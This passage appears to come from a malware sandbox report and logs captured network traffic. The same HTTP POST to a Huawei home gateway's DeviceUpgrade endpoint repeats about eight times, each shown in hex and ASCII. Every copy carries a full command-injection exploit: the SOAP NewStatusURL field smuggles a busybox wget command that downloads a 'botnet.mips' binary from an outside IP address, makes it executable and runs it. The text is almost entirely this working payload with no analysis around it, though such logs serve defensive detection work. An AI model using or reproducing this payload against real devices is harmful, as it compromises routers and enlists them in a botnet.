/botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
